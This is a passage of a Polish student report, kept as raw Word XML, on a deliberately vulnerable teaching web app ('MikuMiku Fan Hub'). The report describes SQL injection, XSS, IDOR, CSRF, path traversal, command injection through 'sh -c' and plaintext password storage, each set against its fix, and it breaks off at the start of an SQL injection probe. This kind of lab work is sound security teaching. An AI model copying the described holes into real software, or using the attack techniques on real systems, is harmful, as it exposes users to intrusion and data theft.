          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 1. Fragment materiału testowego (bash). Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2001"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">W raporcie wykorzystano narzędzia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HTTPie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wyłącznie jako klientów testujących lokalną aplikację. Narzędzia te nie były używane do skanowania Internetu ani systemów produkcyjnych.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="6" w:name="sec6"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. Wdrożona funkcjonalność aplikacji</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>W finalnej wersji wdrożono następujące funkcje:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Vocaloid library search</w:t>
      </w:r>
      <w:r>
        <w:t>: poprawnie wyszukuje wpisy; w trybie vulnerable pokazuje SQL Injection przez konkatenację SQL; w trybie secure używa zapytań parametryzowanych.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fan post comments</w:t>
      </w:r>
      <w:r>
        <w:t>: poprawnie zapisuje komentarze; w trybie vulnerable renderuje raw HTML; w trybie secure escapuje treść użytkownika.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:t>: poprawnie tworzy sesję po podaniu hasła; w trybie vulnerable ignoruje hasło dla istniejącego loginu; w trybie secure używa bcrypt i limitu błędnych prób.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Moderation queue</w:t>
      </w:r>
      <w:r>
        <w:t>: poprawnie pozwala usuwać własne wpisy albo wpisy jako admin; w trybie vulnerable brakuje sprawdzania właściciela; w trybie secure sprawdzany jest autor albo rola admina.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Profile notification settings</w:t>
      </w:r>
      <w:r>
        <w:t>: poprawnie zmienia email powiadomień; w trybie vulnerable brakuje tokena CSRF; w trybie secure token musi zgadzać się z cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Member directory</w:t>
      </w:r>
      <w:r>
        <w:t>: poprawnie pokazuje metadane kont; w trybie vulnerable ujawnia hasła jawne w DB; w trybie secure przechowuje skróty bcrypt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fanart vault preview</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: poprawnie podgląda pliki z </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>uploads/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; w trybie vulnerable pozwala na </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r>
        <w:t>; w trybie secure ścieżka jest normalizowana i ograniczona do katalogu uploadów.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Stream relay check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: poprawnie wykonuje test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; w trybie vulnerable używa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sh -c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> z inputem; w trybie secure wykonuje </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>exec.Command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bez powłoki.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Główne ścieżki użytkowe aplikacji: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"/ui/library"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PageSearch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"/ui/profile"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ProfileSettings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"/ui/profile"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ProfileSettings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"/ui/moderation"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PageIDOR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"/ui/members"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PageDBExpose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"/ui/gallery"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PagePathTraversal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"/ui/stream-check"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PageCmdInjection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02" w:name="lst2"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 2. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2002"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Każda z tych ścieżek ma sens użytkowy bez ataku. Dopiero po wprowadzeniu spreparowanych danych wejściowych widoczna jest różnica między trybem vulnerable i secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="7" w:name="sec7"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6. Organizacja pracy i odpowiedzialność</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Projekt wykonano w zespole dwuosobowym.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="3001" w:name="tbl1"/>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Tabela 1. Zestawienie danych raportowych. Źródło: opracowanie własne.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3001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9EA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Osoba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4819"/>
            <w:shd w:fill="D9EA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Zakres odpowiedzialności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Mateusz Misiak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implementacja backendu Go/Gin, trasy vulnerable/secure, integracja SQLite, scenariusze SQL Injection, testy integracyjne, generowanie PDF/DOCX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Kamil Erbel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warstwa UI/Templ/Tailwind, przygotowanie ekranów funkcjonalnych, opis scenariuszy manualnych, diagramy, zrzuty ekranów i redakcja sprawozdania</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Podział pracy miał charakter praktyczny: jedna osoba odpowiadała głównie za logikę serwerową i kontrolę podatności, druga za warstwę prezentacji, dokumentację i materiał dowodowy. Obie osoby uczestniczyły w weryfikacji działania aplikacji oraz porównaniu zachowania vulnerable/secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Seed bazy zawiera konta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>user1</w:t>
      </w:r>
      <w:r>
        <w:t>, wpisy opublikowane, wpis roboczy administratora oraz komentarze. Dzięki temu ataki IDOR, SQL Injection, Stored XSS i Sensitive Data Exposure można przeprowadzić na danych, które są powiązane z normalnym działaniem portalu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="8" w:name="sec8"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. Architektura funkcjonalna</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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2" w:name="fig2"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 2. Architektura aplikacji. Źródło: opracowanie własne.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1002"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Wersja funkcjonalna nadal korzysta z tej samej architektury: Gin jako router HTTP, warstwa handlers, warstwa service, SQLite oraz Templ jako system widoków. Zmieniła się głównie semantyka UI i mapowanie tras.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40680" cy="2442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44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3" w:name="fig3"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 3. Diagram Mermaid - architektura funkcjonalna. Źródło: diagram Mermaid wygenerowany z opisu architektury.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1003"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="9" w:name="sec9"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8. Mapa funkcji i podatności</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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37959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vulnerability-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95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4" w:name="fig4"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 4. Mapa funkcja-podatność. Źródło: opracowanie własne.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1004"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Poniższa mapa pokazuje, że podatności nie są osobnymi ćwiczeniami, tylko słabymi punktami typowych funkcji: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40680" cy="19847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vulnerability-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984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5" w:name="fig5"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 5. Diagram Mermaid - mapa funkcji i podatności. Źródło: diagram Mermaid wygenerowany z opisu architektury.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1005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36553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6" w:name="fig6"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 6. Macierz ryzyka. Źródło: opracowanie własne.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1006"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="10" w:name="sec10"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9. Dokumentacja ekranów i poprawne użycie aplikacji</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="11" w:name="sec11"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.1. Fan posts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11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9146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-01-fan-po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7" w:name="fig7"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 7. Fan posts. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1007"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Widok </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fan posts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jest główną tablicą społeczności. Przy poprawnym użyciu użytkownik przegląda opublikowane wpisy, dodaje własny post i może przejść do szczegółów wpisu. Formularz przyjmuje tytuł, treść oraz opcjonalny załącznik. Bez ataku ekran działa jak typowy moduł blogowy: nowe wpisy trafiają na listę, a użytkownik widzi autora i status publikacji.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="12" w:name="sec12"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.2. Vocaloid library search</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12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9146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-02-library-sql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8" w:name="fig8"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 8. Vocaloid library SQLi. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1008"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Wyszukiwarka biblioteki służy do odnajdywania wpisów po tytule i treści. Poprawny input, np. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Miku</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, zwraca publiczne materiały pasujące do frazy. W trybie podatnym ta sama funkcja jest miejscem SQL Injection, ponieważ serwer dokleja treść pola do zapytania SQL. W trybie bezpiecznym używany jest placeholder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>, więc wyszukiwanie pozostaje zwykłą operacją tekstową.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="13" w:name="sec13"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.3. Security map</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13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9146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-03-security-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9" w:name="fig9"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 9. Security map. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1009"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Mapa bezpieczeństwa jest zestawieniem funkcji i odpowiadających im klas podatności. Ekran porządkuje opis projektu: dla każdej funkcji wskazuje metodę wywołania, skutek w trybie podatnym oraz rezultat po naprawie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="14" w:name="sec14"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.4. Member directory</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14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9146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-04-member-directo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10" w:name="fig10"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 10. Member directory. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1010"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Katalog członków prezentuje wewnętrzny widok kont, ról i adresów email. Bez ataku służy jako panel utrzymaniowy. W trybie vulnerable ujawnia jednak, że kolumna </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zawiera hasła jawne; w trybie secure widoczne są skróty bcrypt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="15" w:name="sec15"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.5. Fanart vault preview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15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9146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-05-fanart-vault-travers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11" w:name="fig11"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 11. Fanart vault traversal. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1011"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Fanart vault służy do podglądu plików załączonych do wpisów. Poprawna nazwa pliku powinna wskazywać zasób z katalogu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>uploads/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. W trybie podatnym parametr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pozwala wyjść poza ten katalog, a w trybie secure ścieżka jest normalizowana i sprawdzana.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="16" w:name="sec16"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.6. Stream relay health check</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16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9146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-06-stream-check-command-injec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12" w:name="fig12"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 12. Stream relay command injection. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1012"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Stream relay health check sprawdza, czy host streamu odpowiada na </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Poprawny input, np. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, zwraca wynik diagnostyki sieciowej. W trybie podatnym wartość pola trafia do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sh -c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, więc metaznaki powłoki wykonują dodatkowe komendy. W trybie secure host przechodzi walidację i jest przekazywany do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>exec.Command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bez shella.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="17" w:name="sec17"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.7. Profile notification settings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17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9146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-07-profile-csr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13" w:name="fig13"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 13. Profile CSRF. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1013"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Zmiana maila powiadomień jest normalną operacją zmiany stanu. Poprawny użytkownik wpisuje nowy adres i wysyła formularz. W trybie podatnym brakuje tokena CSRF, więc taki sam POST może zostać wysłany przez obcą stronę. W trybie secure formularz zawiera token, który musi zgadzać się z cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="18" w:name="sec18"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.8. Moderation queue</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18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9146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-08-moderation-id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14" w:name="fig14"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 14. Moderation IDOR. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1014"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Kolejka moderacyjna pokazuje akcję usunięcia wpisu. W poprawnym scenariuszu autor usuwa własny post albo administrator usuwa dowolny wpis. W trybie podatnym wystarczy być zalogowanym, aby usunąć cudzy post. W trybie bezpiecznym serwer sprawdza autora albo rolę admina.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3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-workflow-vocaloi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15" w:name="fig15"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 15. Schemat podatny/bezpieczny w aplikacji. Źródło: grafika wygenerowana AI na potrzeby projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1015"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="19" w:name="sec19"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10. Scenariusze podatności</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>W tej części opisano przebieg testów manualnych wykonanych na funkcjach aplikacji. Każdy scenariusz ma ten sam układ: najpierw przedstawiono poprawne użycie funkcji, następnie wektor ataku w trybie vulnerable, a na końcu zachowanie tej samej funkcji po przełączeniu aplikacji w tryb secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="20" w:name="sec20"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11. Rozszerzone przebiegi ataków na faktycznych funkcjach</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="21" w:name="sec21"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.1. A. SQL Injection w wyszukiwarce Vocaloid library</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcja strony:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> użytkownik korzysta z </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Library</w:t>
      </w:r>
      <w:r>
        <w:t>, aby wyszukać posty, tagi, producentów i notatki o utworach.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Poprawne użycie:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> użytkownik wpisuje </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Miku</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Project DIVA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> albo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cosplay</w:t>
      </w:r>
      <w:r>
        <w:t>. Aplikacja zwraca tylko opublikowane wpisy pasujące do tytułu albo treści. Wynik jest listą fan postów, a input nie powinien mieć wpływu na strukturę zapytania SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Atak w trybie vulnerable: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Użytkownik otwiera </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/library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 xml:space="preserve">Najpierw wykonuje zwykłe wyszukiwanie, np. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Miku</w:t>
      </w:r>
      <w:r>
        <w:t>, żeby pokazać, że to normalna funkcja katalogu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Następnie atakujący wykonuje sondę logiczną. To nie jest prosta tautologia, tylko pytanie zadane bazie: czy istnieje użytkownik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
